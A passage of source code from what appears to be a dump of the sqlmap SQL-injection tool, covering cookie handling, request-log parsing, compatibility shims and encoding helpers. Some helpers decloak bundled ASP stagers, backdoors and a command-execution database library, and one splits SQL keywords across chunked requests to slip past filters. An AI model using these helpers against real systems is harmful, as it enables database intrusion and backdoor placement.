PARTIAL_HEX_VALUE_MARKER)):\n            retVal = None\n\n    return retVal\n\ndef resetCookieJar(cookieJar):\n    \"\"\"\n    Cleans cookies from a given cookie jar\n    \"\"\"\n\n    if not conf.loadCookies:\n        cookieJar.clear()\n    else:\n        try:\n            if not cookieJar.filename:\n                infoMsg = \"loading cookies from '%s'\" % conf.loadCookies\n                logger.info(infoMsg)\n\n                content = readCachedFileContent(conf.loadCookies)\n                lines = filterNone(line.strip() for line in content.split(\"\\n\") if not line.startswith('#'))\n                handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR)\n                os.close(handle)\n\n                # Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html\n                with openFile(filename, \"w+b\") as f:\n                    f.write(\"%s\\n\" % NETSCAPE_FORMAT_HEADER_COOKIES)\n                    for line in lines:\n                        _ = line.split(\"\\t\")\n                        if len(_) == 7:\n                            _[4] = FORCE_COOKIE_EXPIRATION_TIME\n                            f.write(\"\\n%s\" % \"\\t\".join(_))\n\n                cookieJar.filename = filename\n\n            cookieJar.load(cookieJar.filename, ignore_expires=True)\n\n            for cookie in cookieJar:\n                if getattr(cookie, \"expires\", MAX_INT) < time.time():\n                    warnMsg = \"cookie '%s' has expired\" % cookie\n                    singleTimeWarnMessage(warnMsg)\n\n            cookieJar.clear_expired_cookies()\n\n            if not cookieJar._cookies:\n                errMsg = \"no valid cookies found\"\n                raise SqlmapGenericException(errMsg)\n\n        except Exception as ex:\n            errMsg = \"there was a problem loading \"\n            errMsg += \"cookies file ('%s')\" % re.sub(r\"(cookies) file '[^']+'\", r\"\\g<1>\", getSafeExString(ex))\n            raise SqlmapGenericException(errMsg)\n\ndef decloakToTemp(filename):\n    \"\"\"\n    Decloaks content of a given file to a temporary file with similar name and extension\n\n    NOTE: using in-memory decloak() in docTests because of the \"problem\" on Windows platform\n\n    >>> decloak(os.path.join(paths.SQLMAP_SHELL_PATH, \"stagers\", \"stager.asp_\")).startswith(b'<%')\n    True\n    >>> decloak(os.path.join(paths.SQLMAP_SHELL_PATH, \"backdoors\", \"backdoor.asp_\")).startswith(b'<%')\n    True\n    >>> b'sys_eval' in decloak(os.path.join(paths.SQLMAP_UDF_PATH, \"postgresql\", \"linux\", \"64\", \"11\", \"lib_postgresqludf_sys.so_\"))\n    True\n    \"\"\"\n\n    content = decloak(filename)\n\n    parts = os.path.split(filename[:-1])[-1].split('.')\n    prefix, suffix = parts[0], '.' + parts[-1]\n    handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix)\n    os.close(handle)\n\n    with openFile(filename, \"w+b\", encoding=None) as f:\n        f.write(content)\n\n    return filename\n\ndef prioritySortColumns(columns):\n    \"\"\"\n    Sorts given column names by length in ascending order while those containing\n    string 'id' go first\n\n    >>> prioritySortColumns(['password', 'userid', 'name'])\n    ['userid', 'name', 'password']\n    \"\"\"\n\n    def _(column):\n        return column and re.search(r\"^id|id$\", column, re.I) is not None\n\n    return sorted(sorted(columns, key=len), key=functools.cmp_to_key(lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0))\n\ndef getRequestHeader(request, name):\n    \"\"\"\n    Solving an issue with an urllib2 Request header case sensitivity\n\n    # Reference: http://bugs.python.org/issue2275\n\n    >>> _ = lambda _: _\n    >>> _.headers = {\"FOO\": \"BAR\"}\n    >>> _.header_items = lambda: _.headers.items()\n    >>> getText(getRequestHeader(_, \"foo\"))\n    'BAR'\n    \"\"\"\n\n    retVal = None\n\n    if request and request.headers and name:\n        _ = name.upper()\n        retVal = max(getBytes(value if _ == key.upper() else \"\") for key, value in request.header_items()) or None\n\n    return retVal\n\ndef isNumber(value):\n    \"\"\"\n    Returns True if the given value is a number-like object\n\n    >>> isNumber(1)\n    True\n    >>> isNumber('0')\n    True\n    >>> isNumber('foobar')\n    False\n    \"\"\"\n\n    try:\n        float(value)\n    except:\n        return False\n    else:\n        return True\n\ndef zeroDepthSearch(expression, value):\n    \"\"\"\n    Searches occurrences of value inside expression at 0-depth level\n    regarding the parentheses\n\n    >>> _ = \"SELECT (SELECT id FROM users WHERE 2>1) AS result FROM DUAL\"; _[zeroDepthSearch(_, \"FROM\")[0]:]\n    'FROM DUAL'\n    >>> _ = \"a(b; c),d;e\"; _[zeroDepthSearch(_, \"[;, ]\")[0]:]\n    ',d;e'\n    \"\"\"\n\n    retVal = []\n\n    depth = 0\n    for index in xrange(len(expression)):\n        if expression[index] == '(':\n            depth += 1\n        elif expression[index] == ')':\n            depth -= 1\n        elif depth == 0:\n            if value.startswith('[') and value.endswith(']'):\n                if re.search(value, expression[index:index + 1]):\n                    retVal.append(index)\n            elif expression[index:index + len(value)] == value:\n                retVal.append(index)\n\n    return retVal\n\ndef splitFields(fields, delimiter=','):\n    \"\"\"\n    Returns list of (0-depth) fields splitted by delimiter\n\n    >>> splitFields('foo, bar, max(foo, bar)')\n    ['foo', 'bar', 'max(foo,bar)']\n    \"\"\"\n\n    fields = fields.replace(\"%s \" % delimiter, delimiter)\n    commas = [-1, len(fields)]\n    commas.extend(zeroDepthSearch(fields, ','))\n    commas = sorted(commas)\n\n    return [fields[x + 1:y] for (x, y) in _zip(commas, commas[1:])]\n\ndef pollProcess(process, suppress_errors=False):\n    \"\"\"\n    Checks for process status (prints . if still running)\n    \"\"\"\n\n    while process:\n        dataToStdout(\".\")\n        time.sleep(1)\n\n        returncode = process.poll()\n\n        if returncode is not None:\n            if not suppress_errors:\n                if returncode == 0:\n                    dataToStdout(\" done\\n\")\n                elif returncode < 0:\n                    dataToStdout(\" process terminated by signal %d\\n\" % returncode)\n                elif returncode > 0:\n                    dataToStdout(\" quit unexpectedly with return code %d\\n\" % returncode)\n\n            break\n\ndef parseRequestFile(reqFile, checkParams=True):\n    \"\"\"\n    Parses WebScarab and Burp logs and adds results to the target URL list\n\n    >>> handle, reqFile = tempfile.mkstemp(suffix=\".req\")\n    >>> content = b\"POST / HTTP/1.0\\\\nUser-agent: foobar\\\\nHost: www.example.com\\\\n\\\\nid=1\\\\n\"\n    >>> _ = os.write(handle, content)\n    >>> os.close(handle)\n    >>> next(parseRequestFile(reqFile)) == ('http://www.example.com:80/', 'POST', 'id=1', None, (('User-agent', 'foobar'), ('Host', 'www.example.com')))\n    True\n    \"\"\"\n\n    def _parseWebScarabLog(content):\n        \"\"\"\n        Parses WebScarab logs (POST method not supported)\n        \"\"\"\n\n        reqResList = content.split(WEBSCARAB_SPLITTER)\n\n        for request in reqResList:\n            url = extractRegexResult(r\"URL: (?P<result>.+?)\\n\", request, re.I)\n            method = extractRegexResult(r\"METHOD: (?P<result>.+?)\\n\", request, re.I)\n            cookie = extractRegexResult(r\"COOKIE: (?P<result>.+?)\\n\", request, re.I)\n\n            if not method or not url:\n                logger.debug(\"not a valid WebScarab log data\")\n                continue\n\n            if method.upper() == HTTPMETHOD.POST:\n                warnMsg = \"POST requests from WebScarab logs aren't supported \"\n                warnMsg += \"as their body content is stored in separate files. \"\n                warnMsg += \"Nevertheless you can use -r to load them individually.\"\n                logger.warning(warnMsg)\n                continue\n\n            if not(conf.scope and not re.search(conf.scope, url, re.I)):\n                yield (url, method, None, cookie, tuple())\n\n    def _parseBurpLog(content):\n        \"\"\"\n        Parses Burp logs\n        \"\"\"\n\n        if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S):\n            if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S):\n                reqResList = []\n                for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):\n                    port, request = match.groups()\n                    try:\n                        request = decodeBase64(request, binary=False)\n                    except (binascii.Error, TypeError):\n                        continue\n                    _ = re.search(r\"%s:.+\" % re.escape(HTTP_HEADER.HOST), request)\n                    if _:\n                        host = _.group(0).strip()\n                        if not re.search(r\":\\d+\\Z\", host):\n                            request = request.replace(host, \"%s:%d\" % (host, int(port)))\n                    reqResList.append(request)\n            else:\n                reqResList = [content]\n        else:\n            reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S)\n\n        for match in reqResList:\n            request = match if isinstance(match, six.string_types) else match.group(1)\n            request = re.sub(r\"\\A[^\\w]+\", \"\", request)\n            schemePort = re.search(r\"(http[\\w]*)\\:\\/\\/.*?\\:([\\d]+).+?={10,}\", request, re.I | re.S)\n\n            if schemePort:\n                scheme = schemePort.group(1)\n                port = schemePort.group(2)\n                request = re.sub(r\"\\n=+\\Z\", \"\", request.split(schemePort.group(0))[-1].lstrip())\n            else:\n                scheme, port = None, None\n\n            if \"HTTP/\" not in request:\n                continue\n\n            if re.search(r\"^[\\n]*%s[^?]*?\\.(%s)\\sHTTP\\/\" % (HTTPMETHOD.GET, \"|\".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M):\n                if not re.search(r\"^[\\n]*%s[^\\n]*\\*[^\\n]*\\sHTTP\\/\" % HTTPMETHOD.GET, request, re.I | re.M):\n                    continue\n\n            getPostReq = False\n            url = None\n            host = None\n            method = None\n            data = None\n            cookie = None\n            params = False\n            newline = None\n            lines = request.split('\\n')\n            headers = []\n\n            for index in xrange(len(lines)):\n                line = lines[index]\n\n                if not line.strip() and index == len(lines) - 1:\n                    break\n\n                newline = \"\\r\\n\" if line.endswith('\\r') else '\\n'\n                line = line.strip('\\r')\n                match = re.search(r\"\\A([A-Z]+) (.+) HTTP/[\\d.]+\\Z\", line) if not method else None\n\n                if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:\n                    data = \"\"\n                    params = True\n\n                elif match:\n                    method = match.group(1)\n                    url = match.group(2)\n\n                    if any(_ in line for _ in ('?', '=', kb.customInjectionMark)):\n                        params = True\n\n                    getPostReq = True\n\n                # POST parameters\n                elif data is not None and params:\n                    data += \"%s%s\" % (line, newline)\n\n                # GET parameters\n                elif \"?\" in line and \"=\" in line and \": \" not in line:\n                    params = True\n\n                # Headers\n                elif re.search(r\"\\A\\S+:\", line):\n                    key, value = line.split(\":\", 1)\n                    value = value.strip().replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n\n                    # Note: overriding values with --headers '...'\n                    match = re.search(r\"(?i)\\b(%s): ([^\\n]*)\" % re.escape(key), conf.headers or \"\")\n                    if match:\n                        key, value = match.groups()\n\n                    # Cookie and Host headers\n                    if key.upper() == HTTP_HEADER.COOKIE.upper():\n                        cookie = value\n                    elif key.upper() == HTTP_HEADER.HOST.upper():\n                        if '://' in value:\n                            scheme, value = value.split('://')[:2]\n                        splitValue = value.split(\":\")\n                        host = splitValue[0]\n\n                        if len(splitValue) > 1:\n                            port = filterStringValue(splitValue[1], \"[0-9]\")\n\n                    # Avoid to add a static content length header to\n                    # headers and consider the following lines as\n                    # POSTed data\n                    if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():\n                        params = True\n\n                    # Avoid proxy and connection type related headers\n                    elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION, HTTP_HEADER.IF_MODIFIED_SINCE, HTTP_HEADER.IF_NONE_MATCH):\n                        headers.append((getUnicode(key), getUnicode(value)))\n\n                    if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, \"\", value or \"\"):\n                        params = True\n\n            data = data.rstrip(\"\\r\\n\") if data else data\n\n            if getPostReq and (params or cookie or not checkParams):\n                if not port and hasattr(scheme, \"lower\") and scheme.lower() == \"https\":\n                    port = \"443\"\n                elif not scheme and port == \"443\":\n                    scheme = \"https\"\n\n                if conf.forceSSL:\n                    scheme = \"https\"\n                    port = port or \"443\"\n\n                if not host:\n                    errMsg = \"invalid format of a request file\"\n                    raise SqlmapSyntaxException(errMsg)\n\n                if not url.startswith(\"http\"):\n                    url = \"%s://%s:%s%s\" % (scheme or \"http\", host, port or \"80\", url)\n                    scheme = None\n                    port = None\n\n                if not(conf.scope and not re.search(conf.scope, url, re.I)):\n                    yield (url, conf.method or method, data, cookie, tuple(headers))\n\n    content = readCachedFileContent(reqFile)\n\n    if conf.scope:\n        logger.info(\"using regular expression '%s' for filtering targets\" % conf.scope)\n\n        try:\n            re.compile(conf.scope)\n        except Exception as ex:\n            errMsg = \"invalid regular expression '%s' ('%s')\" % (conf.scope, getSafeExString(ex))\n            raise SqlmapSyntaxException(errMsg)\n\n    for target in _parseBurpLog(content):\n        yield target\n\n    for target in _parseWebScarabLog(content):\n        yield target\n\ndef getSafeExString(ex, encoding=None):\n    \"\"\"\n    Safe way how to get the proper exception represtation as a string\n\n    >>> getSafeExString(SqlmapBaseException('foobar')) == 'foobar'\n    True\n    >>> getSafeExString(OSError(0, 'foobar')) == 'OSError: foobar'\n    True\n    \"\"\"\n\n    retVal = None\n\n    if getattr(ex, \"message\", None):\n        retVal = ex.message\n    elif getattr(ex, \"msg\", None):\n        retVal = ex.msg\n    elif getattr(ex, \"args\", None):\n        for candidate in ex.args[::-1]:\n            if isinstance(candidate, six.string_types):\n                retVal = candidate\n                break\n\n    if retVal is None:\n        retVal = str(ex)\n    elif not isinstance(ex, SqlmapBaseException):\n        retVal = \"%s: %s\" % (type(ex).__name__, retVal)\n\n    return getUnicode(retVal or \"\", encoding=encoding).strip()\n\ndef safeVariableNaming(value):\n    \"\"\"\n    Returns escaped safe-representation of a given variable name that can be used in Python evaluated code\n\n    >>> safeVariableNaming(\"class.id\") == \"EVAL_636c6173732e6964\"\n    True\n    \"\"\"\n\n    if value in keyword.kwlist or re.search(r\"\\A[^a-zA-Z]|[^\\w]\", value):\n        value = \"%s%s\" % (EVALCODE_ENCODED_PREFIX, getUnicode(binascii.hexlify(getBytes(value))))\n\n    return value\n\ndef unsafeVariableNaming(value):\n    \"\"\"\n    Returns unescaped safe-representation of a given variable name\n\n    >>> unsafeVariableNaming(\"EVAL_636c6173732e6964\") == \"class.id\"\n    True\n    \"\"\"\n\n    if value.startswith(EVALCODE_ENCODED_PREFIX):\n        value = decodeHex(value[len(EVALCODE_ENCODED_PREFIX):], binary=False)\n\n    return value\n\ndef firstNotNone(*args):\n    \"\"\"\n    Returns first not-None value from a given list of arguments\n\n    >>> firstNotNone(None, None, 1, 2, 3)\n    1\n    \"\"\"\n\n    retVal = None\n\n    for _ in args:\n        if _ is not None:\n            retVal = _\n            break\n\n    return retVal\n\ndef removePostHintPrefix(value):\n    \"\"\"\n    Remove POST hint prefix from a given value (name)\n\n    >>> removePostHintPrefix(\"JSON id\")\n    'id'\n    >>> removePostHintPrefix(\"id\")\n    'id'\n    \"\"\"\n\n    return re.sub(r\"\\A(%s) \" % '|'.join(re.escape(__) for __ in getPublicTypeMembers(POST_HINT, onlyValues=True)), \"\", value)\n\ndef chunkSplitPostData(data):\n    \"\"\"\n    Convert POST data to chunked transfer-encoded data (Note: splitting done by SQL keywords)\n\n    >>> random.seed(0)\n    >>> chunkSplitPostData(\"SELECT username,password FROM users\")\n    '5;4Xe90\\\\r\\\\nSELEC\\\\r\\\\n3;irWlc\\\\r\\\\nT u\\\\r\\\\n1;eT4zO\\\\r\\\\ns\\\\r\\\\n5;YB4hM\\\\r\\\\nernam\\\\r\\\\n9;2pUD8\\\\r\\\\ne,passwor\\\\r\\\\n3;mp07y\\\\r\\\\nd F\\\\r\\\\n5;8RKXi\\\\r\\\\nROM u\\\\r\\\\n4;MvMhO\\\\r\\\\nsers\\\\r\\\\n0\\\\r\\\\n\\\\r\\\\n'\n    \"\"\"\n\n    length = len(data)\n    retVal = \"\"\n    index = 0\n\n    while index < length:\n        chunkSize = randomInt(1)\n\n        if index + chunkSize >= length:\n            chunkSize = length - index\n\n        salt = randomStr(5, alphabet=string.ascii_letters + string.digits)\n\n        while chunkSize:\n            candidate = data[index:index + chunkSize]\n\n            if re.search(r\"\\b%s\\b\" % '|'.join(HTTP_CHUNKED_SPLIT_KEYWORDS), candidate, re.I):\n                chunkSize -= 1\n            else:\n                break\n\n        index += chunkSize\n        retVal += \"%x;%s\\r\\n\" % (chunkSize, salt)\n        retVal += \"%s\\r\\n\" % candidate\n\n    retVal += \"0\\r\\n\\r\\n\"\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/lib/core/compat.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport binascii\nimport functools\nimport math\nimport os\nimport random\nimport sys\nimport time\nimport uuid\n\nclass WichmannHill(random.Random):\n    \"\"\"\n    Reference: https://svn.python.org/projects/python/trunk/Lib/random.py\n    \"\"\"\n\n    VERSION = 1     # used by getstate/setstate\n\n    def seed(self, a=None):\n        \"\"\"Initialize internal state from hashable object.\n\n        None or no argument seeds from current time or from an operating\n        system specific randomness source if available.\n\n        If a is not None or an int or long, hash(a) is used instead.\n\n        If a is an int or long, a is used directly.  Distinct values between\n        0 and 27814431486575L inclusive are guaranteed to yield distinct\n        internal states (this guarantee is specific to the default\n        Wichmann-Hill generator).\n        \"\"\"\n\n        if a is None:\n            try:\n                a = int(binascii.hexlify(os.urandom(16)), 16)\n            except NotImplementedError:\n                a = int(time.time() * 256)  # use fractional seconds\n\n        if not isinstance(a, int):\n            a = hash(a)\n\n        a, x = divmod(a, 30268)\n        a, y = divmod(a, 30306)\n        a, z = divmod(a, 30322)\n        self._seed = int(x) + 1, int(y) + 1, int(z) + 1\n\n        self.gauss_next = None\n\n    def random(self):\n        \"\"\"Get the next random number in the range [0.0, 1.0).\"\"\"\n\n        # Wichman-Hill random number generator.\n        #\n        # Wichmann, B. A. & Hill, I. D. (1982)\n        # Algorithm AS 183:\n        # An efficient and portable pseudo-random number generator\n        # Applied Statistics 31 (1982) 188-190\n        #\n        # see also:\n        #        Correction to Algorithm AS 183\n        #        Applied Statistics 33 (1984) 123\n        #\n        #        McLeod, A. I. (1985)\n        #        A remark on Algorithm AS 183\n        #        Applied Statistics 34 (1985),198-200\n\n        # This part is thread-unsafe:\n        # BEGIN CRITICAL SECTION\n        x, y, z = self._seed\n        x = (171 * x) % 30269\n        y = (172 * y) % 30307\n        z = (170 * z) % 30323\n        self._seed = x, y, z\n        # END CRITICAL SECTION\n\n        # Note:  on a platform using IEEE-754 double arithmetic, this can\n        # never return 0.0 (asserted by Tim; proof too long for a comment).\n        return (x / 30269.0 + y / 30307.0 + z / 30323.0) % 1.0\n\n    def getstate(self):\n        \"\"\"Return internal state; can be passed to setstate() later.\"\"\"\n        return self.VERSION, self._seed, self.gauss_next\n\n    def setstate(self, state):\n        \"\"\"Restore internal state from object returned by getstate().\"\"\"\n        version = state[0]\n        if version == 1:\n            version, self._seed, self.gauss_next = state\n        else:\n            raise ValueError(\"state with version %s passed to \"\n                             \"Random.setstate() of version %s\" %\n                             (version, self.VERSION))\n\n    def jumpahead(self, n):\n        \"\"\"Act as if n calls to random() were made, but quickly.\n\n        n is an int, greater than or equal to 0.\n\n        Example use:  If you have 2 threads and know that each will\n        consume no more than a million random numbers, create two Random\n        objects r1 and r2, then do\n            r2.setstate(r1.getstate())\n            r2.jumpahead(1000000)\n        Then r1 and r2 will use guaranteed-disjoint segments of the full\n        period.\n        \"\"\"\n\n        if n < 0:\n            raise ValueError(\"n must be >= 0\")\n        x, y, z = self._seed\n        x = int(x * pow(171, n, 30269)) % 30269\n        y = int(y * pow(172, n, 30307)) % 30307\n        z = int(z * pow(170, n, 30323)) % 30323\n        self._seed = x, y, z\n\n    def __whseed(self, x=0, y=0, z=0):\n        \"\"\"Set the Wichmann-Hill seed from (x, y, z).\n\n        These must be integers in the range [0, 256).\n        \"\"\"\n\n        if not type(x) == type(y) == type(z) == int:\n            raise TypeError('seeds must be integers')\n        if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256):\n            raise ValueError('seeds must be in range(0, 256)')\n        if 0 == x == y == z:\n            # Initialize from current time\n            t = int(time.time() * 256)\n            t = int((t & 0xffffff) ^ (t >> 24))\n            t, x = divmod(t, 256)\n            t, y = divmod(t, 256)\n            t, z = divmod(t, 256)\n        # Zero is a poor seed, so substitute 1\n        self._seed = (x or 1, y or 1, z or 1)\n\n        self.gauss_next = None\n\n    def whseed(self, a=None):\n        \"\"\"Seed from hashable object's hash code.\n\n        None or no argument seeds from current time.  It is not guaranteed\n        that objects with distinct hash codes lead to distinct internal\n        states.\n\n        This is obsolete, provided for compatibility with the seed routine\n        used prior to Python 2.1.  Use the .seed() method instead.\n        \"\"\"\n\n        if a is None:\n            self.__whseed()\n            return\n        a = hash(a)\n        a, x = divmod(a, 256)\n        a, y = divmod(a, 256)\n        a, z = divmod(a, 256)\n        x = (x + a) % 256 or 1\n        y = (y + a) % 256 or 1\n        z = (z + a) % 256 or 1\n        self.__whseed(x, y, z)\n\ndef patchHeaders(headers):\n    if headers is not None and not hasattr(headers, \"headers\"):\n        if isinstance(headers, dict):\n            class _(dict):\n                def __getitem__(self, key):\n                    for key_ in self:\n                        if key_.lower() == key.lower():\n                            return super(_, self).__getitem__(key_)\n\n                    raise KeyError(key)\n\n                def get(self, key, default=None):\n                    try:\n                        return self[key]\n                    except KeyError:\n                        return default\n\n            headers = _(headers)\n\n        headers.headers = [\"%s: %s\\r\\n\" % (header, headers[header]) for header in headers]\n\n    return headers\n\ndef cmp(a, b):\n    \"\"\"\n    >>> cmp(\"a\", \"b\")\n    -1\n    >>> cmp(2, 1)\n    1\n    \"\"\"\n\n    if a < b:\n        return -1\n    elif a > b:\n        return 1\n    else:\n        return 0\n\n# Reference: https://github.com/urllib3/urllib3/blob/master/src/urllib3/filepost.py\ndef choose_boundary():\n    \"\"\"\n    >>> len(choose_boundary()) == 32\n    True\n    \"\"\"\n\n    retval = \"\"\n\n    try:\n        retval = uuid.uuid4().hex\n    except AttributeError:\n        retval = \"\".join(random.sample(\"0123456789abcdef\", 1)[0] for _ in xrange(32))\n\n    return retval\n\n# Reference: http://python3porting.com/differences.html\ndef round(x, d=0):\n    \"\"\"\n    >>> round(2.0)\n    2.0\n    >>> round(2.5)\n    3.0\n    \"\"\"\n\n    p = 10 ** d\n    if x > 0:\n        return float(math.floor((x * p) + 0.5)) / p\n    else:\n        return float(math.ceil((x * p) - 0.5)) / p\n\n# Reference: https://code.activestate.com/recipes/576653-convert-a-cmp-function-to-a-key-function/\ndef cmp_to_key(mycmp):\n    \"\"\"Convert a cmp= function into a key= function\"\"\"\n    class K(object):\n        __slots__ = ['obj']\n\n        def __init__(self, obj, *args):\n            self.obj = obj\n\n        def __lt__(self, other):\n            return mycmp(self.obj, other.obj) < 0\n\n        def __gt__(self, other):\n            return mycmp(self.obj, other.obj) > 0\n\n        def __eq__(self, other):\n            return mycmp(self.obj, other.obj) == 0\n\n        def __le__(self, other):\n            return mycmp(self.obj, other.obj) <= 0\n\n        def __ge__(self, other):\n            return mycmp(self.obj, other.obj) >= 0\n\n        def __ne__(self, other):\n            return mycmp(self.obj, other.obj) != 0\n\n        def __hash__(self):\n            raise TypeError('hash not implemented')\n\n    return K\n\n# Note: patch for Python 2.6\nif not hasattr(functools, \"cmp_to_key\"):\n    functools.cmp_to_key = cmp_to_key\n\nif sys.version_info >= (3, 0):\n    xrange = range\n    buffer = memoryview\nelse:\n    xrange = xrange\n    buffer = buffer\n\ntry:\n    from pkg_resources import parse_version as LooseVersion\nexcept ImportError:\n    from distutils.version import LooseVersion\n"
  },
  {
    "path": "sqlmap/lib/core/convert.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import cPickle as pickle\nexcept:\n    import pickle\n\nimport base64\nimport binascii\nimport codecs\nimport json\nimport re\nimport sys\n\nfrom lib.core.bigarray import BigArray\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.settings import INVALID_UNICODE_PRIVATE_AREA\nfrom lib.core.settings import IS_TTY\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import NULL\nfrom lib.core.settings import PICKLE_PROTOCOL\nfrom lib.core.settings import SAFE_HEX_MARKER\nfrom lib.core.settings import UNICODE_ENCODING\nfrom thirdparty import six\nfrom thirdparty.six import unichr as _unichr\nfrom thirdparty.six.moves import collections_abc as _collections\n\ntry:\n    from html import escape as htmlEscape\nexcept ImportError:\n    from cgi import escape as htmlEscape\n\ndef base64pickle(value):\n    \"\"\"\n    Serializes (with pickle) and encodes to Base64 format supplied (binary) value\n\n    >>> base64unpickle(base64pickle([1, 2, 3])) == [1, 2, 3]\n    True\n    \"\"\"\n\n    retVal = None\n\n    try:\n        retVal = encodeBase64(pickle.dumps(value, PICKLE_PROTOCOL), binary=False)\n    except:\n        warnMsg = \"problem occurred while serializing \"\n        warnMsg += \"instance of a type '%s'\" % type(value)\n        singleTimeWarnMessage(warnMsg)\n\n        try:\n            retVal = encodeBase64(pickle.dumps(value), binary=False)\n        except:\n            retVal = encodeBase64(pickle.dumps(str(value), PICKLE_PROTOCOL), binary=False)\n\n    return retVal\n\ndef base64unpickle(value):\n    \"\"\"\n    Decodes value from Base64 to plain format and deserializes (with pickle) its content\n\n    >>> type(base64unpickle('gAJjX19idWlsdGluX18Kb2JqZWN0CnEBKYFxAi4=')) == object\n    True\n    \"\"\"\n\n    retVal = None\n\n    try:\n        retVal = pickle.loads(decodeBase64(value))\n    except TypeError:\n        retVal = pickle.loads(decodeBase64(bytes(value)))\n\n    return retVal\n\ndef htmlUnescape(value):\n    \"\"\"\n    Returns (basic conversion) HTML unescaped value\n\n    >>> htmlUnescape('a&lt;b') == 'a<b'\n    True\n    \"\"\"\n\n    retVal = value\n\n    if value and isinstance(value, six.string_types):\n        replacements = ((\"&lt;\", '<'), (\"&gt;\", '>'), (\"&quot;\", '\"'), (\"&nbsp;\", ' '), (\"&amp;\", '&'), (\"&apos;\", \"'\"))\n        for code, value in replacements:\n            retVal = retVal.replace(code, value)\n\n        try:\n            retVal = re.sub(r\"&#x([^ ;]+);\", lambda match: _unichr(int(match.group(1), 16)), retVal)\n        except (ValueError, OverflowError):\n            pass\n\n    return retVal\n\ndef singleTimeWarnMessage(message):  # Cross-referenced function\n    sys.stdout.write(message)\n    sys.stdout.write(\"\\n\")\n    sys.stdout.flush()\n\ndef filterNone(values):  # Cross-referenced function\n    return [_ for _ in values if _] if isinstance(values, _collections.Iterable) else values\n\ndef isListLike(value):  # Cross-referenced function\n    return isinstance(value, (list, tuple, set, BigArray))\n\ndef shellExec(cmd):  # Cross-referenced function\n    raise NotImplementedError\n\ndef jsonize(data):\n    \"\"\"\n    Returns JSON serialized data\n\n    >>> jsonize({'foo':'bar'})\n    '{\\\\n    \"foo\": \"bar\"\\\\n}'\n    \"\"\"\n\n    return json.dumps(data, sort_keys=False, indent=4)\n\ndef dejsonize(data):\n    \"\"\"\n    Returns JSON deserialized data\n\n    >>> dejsonize('{\\\\n    \"foo\": \"bar\"\\\\n}') == {u'foo': u'bar'}\n    True\n    \"\"\"\n\n    return json.loads(data)\n\ndef decodeHex(value, binary=True):\n    \"\"\"\n    Returns a decoded representation of provided hexadecimal value\n\n    >>> decodeHex(\"313233\") == b\"123\"\n    True\n    >>> decodeHex(\"313233\", binary=False) == u\"123\"\n    True\n    \"\"\"\n\n    retVal = value\n\n    if isinstance(value, six.binary_type):\n        value = getText(value)\n\n    if value.lower().startswith(\"0x\"):\n        value = value[2:]\n\n    try:\n        retVal = codecs.decode(value, \"hex\")\n    except LookupError:\n        retVal = binascii.unhexlify(value)\n\n    if not binary:\n        retVal = getText(retVal)\n\n    return retVal\n\ndef encodeHex(value, binary=True):\n    \"\"\"\n    Returns a encoded representation of provided string value\n\n    >>> encodeHex(b\"123\") == b\"313233\"\n    True\n    >>> encodeHex(\"123\", binary=False)\n    '313233'\n    >>> encodeHex(b\"123\"[0]) == b\"31\"\n    True\n    \"\"\"\n\n    if isinstance(value, int):\n        value = six.unichr(value)\n\n    if isinstance(value, six.text_type):\n        value = value.encode(UNICODE_ENCODING)\n\n    try:\n        retVal = codecs.encode(value, \"hex\")\n    except LookupError:\n        retVal = binascii.hexlify(value)\n\n    if not binary:\n        retVal = getText(retVal)\n\n    return retVal\n\ndef decodeBase64(value, binary=True, encoding=None):\n    \"\"\"\n    Returns a decoded representation of provided Base64 value\n\n    >>> decodeBase64(\"MTIz\") == b\"123\"\n    True\n    >>> decodeBase64(\"MTIz\", binary=False)\n    '123'\n    >>> decodeBase64(\"A-B_CDE\") == decodeBase64(\"A+B/CDE\")\n    True\n    >>> decodeBase64(b\"MTIzNA\") == b\"1234\"\n    True\n    >>> decodeBase64(\"MTIzNA\") == b\"1234\"\n    True\n    >>> decodeBase64(\"MTIzNA==\") == b\"1234\"\n    True\n    \"\"\"\n\n    if value is None:\n        return None\n\n    padding = b'=' if isinstance(value, bytes) else '='\n\n    # Reference: https://stackoverflow.com/a/49459036\n    if not value.endswith(padding):\n        value += 3 * padding\n\n    # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications\n    # Reference: https://perldoc.perl.org/MIME/Base64.html\n    if isinstance(value, bytes):\n        value = value.replace(b'-', b'+').replace(b'_', b'/')\n    else:\n        value = value.replace('-', '+').replace('_', '/')\n\n    retVal = base64.b64decode(value)\n\n    if not binary:\n        retVal = getText(retVal, encoding)\n\n    return retVal\n\ndef encodeBase64(value, binary=True, encoding=None, padding=True, safe=False):\n    \"\"\"\n    Returns a decoded representation of provided Base64 value\n\n    >>> encodeBase64(b\"123\") == b\"MTIz\"\n    True\n    >>> encodeBase64(u\"1234\", binary=False)\n    'MTIzNA=='\n    >>> encodeBase64(u\"1234\", binary=False, padding=False)\n    'MTIzNA'\n    >>> encodeBase64(decodeBase64(\"A-B_CDE\"), binary=False, safe=True)\n    'A-B_CDE'\n    